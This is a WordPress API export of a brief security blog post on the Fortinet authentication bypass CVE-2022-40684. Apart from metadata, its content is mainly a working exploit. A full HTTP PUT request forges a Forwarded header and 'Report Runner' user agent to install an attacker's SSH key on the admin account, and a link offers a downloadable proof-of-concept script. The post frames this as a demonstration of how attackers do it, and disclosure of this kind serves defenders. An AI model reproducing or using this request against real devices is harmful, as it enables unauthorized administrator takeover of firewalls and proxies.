{"id":391,"date":"2022-10-15T12:32:42","date_gmt":"2022-10-15T09:32:42","guid":{"rendered":"https:\/\/trustcrypt.com\/?p=391"},"modified":"2022-10-15T13:01:31","modified_gmt":"2022-10-15T10:01:31","slug":"new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager","status":"publish","type":"post","link":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","title":{"rendered":"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).<br>This vulnerability could allow an attacker to log on as an administrator on an affected system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this article, using FortiOS version 7.2.1 as an example, we will demonstrate how attackers do it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PoC<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Let&#8217;s take a look at the inner workings of this vulnerability. The vulnerability is exploited below to add an SSH key to an administrator user, allowing an attacker to log into the affected system via SSH as an administrator.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PUT \/api\/v2\/cmdb\/system\/admin\/admin HTTP\/1.1 Host: 192.168.10.66 User-Agent: Report Runner Content-Type: application\/json Forwarded: for=\u201d&#91;127.0.0.1]:8000\u2033;by=\u201d&#91;127.0.0.1]:9000\u2033; Content-Length: 606 { \u201cssh-public-key1\u201d: \u201c\\\u201dssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChuU209LX1lleXNEkFkyUsuvFTgNB7kPtPHuO0aZeJ6XBUASECf\/iNLpGnrEwTc\/qUiBHOUGBkunCbx7bpk8bTcQtiTSAfbL2zeA9sxiSzxUrtmW1V0if7TG4cvEJc6dli3v9cjG\/PUnbZv1ej0\/NPqPCc8qAC\/rdWQXZ2+aHy\/RTpLqQHrcJ3hJP6fST8HMSEVbA8H2SFnGZn8tX9bXmYuFuEArBvg\/Fboc8rFTTd6S3GQtaCrBqJ5uJ+D9bg7hqxZp9qqsU+751gxFsxVaE7fAH45pTD\/Wvv+U+APLq\/N7VjAqKn3pmyLun+qT+ib72Xors8DWlAqSMRmkvjg\/BdFeU\/ucRqs+FbJVKAhxiN\/qJIZmR8VfpcK4grkefrko\/eXfrM5qdHKAE1zc5+oNB9CmjyrrFzIXVTTPYl8+6q0YjifT8CP72tgghfXUZzFp3WhsiGQJSVNrOh97lnCh4nrArYUniL7ac5Q415IT8AilnDArjJ\/wFMhaTgftUo878= admin@trustcrypt.com\\\u201d\u201d }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">You can download POC <a href=\"https:\/\/raw.githubusercontent.com\/horizon3ai\/CVE-2022-40684\/master\/CVE-2022-40684.py\" class=\"tlink\">here<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:7px\">Thanks to HORIZON3.ai for the POC<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).This vulnerability could allow an attacker to log on as an administrator&#8230;<\/p>\n","protected":false},"author":1,"featured_media":393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[28],"tags":[],"class_list":["post-391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager - Trustcrypt<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\" \/>\n<meta property=\"og:locale\" content=\"ar_AR\" \/>\n<meta property=\"og:locale:alternate\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager\" \/>\n<meta property=\"og:description\" content=\"Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).This vulnerability could allow an attacker to log on as an administrator...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\" \/>\n<meta property=\"og:site_name\" content=\"Trustcrypt\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-15T09:32:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-10-15T10:01:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"962\" \/>\n\t<meta property=\"og:image:height\" content=\"658\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Trustscrypt\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629\" \/>\n\t<meta name=\"twitter:data1\" content=\"Trustscrypt\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631\" \/>\n\t<meta name=\"twitter:data2\" content=\"\u062f\u0642\u064a\u0642\u0629 \u0648\u0627\u062d\u062f\u0629\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\",\"url\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\",\"name\":\"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager\",\"isPartOf\":{\"@id\":\"https:\/\/trustcrypt.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"datePublished\":\"2022-10-15T09:32:42+00:00\",\"dateModified\":\"2022-10-15T10:01:31+00:00\",\"author\":{\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\"},\"inLanguage\":\"ar\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\",\"url\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"contentUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"width\":962,\"height\":658},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/trustcrypt.com\/#website\",\"url\":\"https:\/\/trustcrypt.com\/\",\"name\":\"Trustcrypt\",\"description\":\"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 \u0627\u0644\u062b\u0627\u0646\u064a\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/trustcrypt.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ar\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\",\"name\":\"Trustscrypt\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"caption\":\"Trustscrypt\"},\"sameAs\":[\"http:\/\/trustcrypt.com\"],\"url\":\"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager - Trustcrypt","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","og_locale":"ar_AR","og_type":"article","og_title":"[:en]New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager[:] - Trustcrypt","og_description":"Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).This vulnerability could allow an attacker to log on as an administrator...","og_url":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","og_site_name":"Trustcrypt","article_published_time":"2022-10-15T09:32:42+00:00","article_modified_time":"2022-10-15T10:01:31+00:00","og_image":[{"width":962,"height":658,"url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","type":"image\/jpeg"}],"author":"Trustscrypt","twitter_card":"summary_large_image","twitter_misc":{"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629":"Trustscrypt","\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631":"\u062f\u0642\u064a\u0642\u0629 \u0648\u0627\u062d\u062f\u0629"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","url":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","name":"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager","isPartOf":{"@id":"https:\/\/trustcrypt.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage"},"image":{"@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage"},"thumbnailUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","datePublished":"2022-10-15T09:32:42+00:00","dateModified":"2022-10-15T10:01:31+00:00","author":{"@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f"},"inLanguage":"ar","potentialAction":[{"@type":"ReadAction","target":["https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/"]}]},{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage","url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","contentUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","width":962,"height":658},{"@type":"WebSite","@id":"https:\/\/trustcrypt.com\/#website","url":"https:\/\/trustcrypt.com\/","name":"Trustcrypt","description":"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 \u0627\u0644\u062b\u0627\u0646\u064a","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/trustcrypt.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ar"},{"@type":"Person","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f","name":"Trustscrypt","image":{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","caption":"Trustscrypt"},"sameAs":["http:\/\/trustcrypt.com"],"url":"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/"}]}},"_links":{"self":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/comments?post=391"}],"version-history":[{"count":9,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":406,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391\/revisions\/406"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media\/393"}],"wp:attachment":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media?parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/categories?post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/tags?post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}